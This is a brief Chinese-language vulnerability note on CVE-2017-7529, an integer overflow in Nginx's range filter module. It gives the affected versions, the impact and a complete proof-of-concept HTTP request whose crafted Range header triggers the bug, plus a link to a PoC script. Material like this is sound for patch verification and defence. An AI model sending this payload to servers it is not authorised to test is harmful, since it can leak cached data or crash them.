原理Nginx范围过滤器模块中存在整数溢出漏洞,允许远程攻击者利用漏洞提交特殊的请求,获取敏感信息或使应用程序崩溃。影响范围Nginx < 1.13.2危害获取缓存的HTTP请求或使应用程序崩溃。POC & EXP手工GET / HTTP/1.1 Host: x.x.x.x User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close Range: bytes=-17208,-9223372036854758792状态码为206则说明存在漏洞。脚本https://github.com/en0f/CVE-2017-7529_PoC
Equinox
一个乐于分享的网安人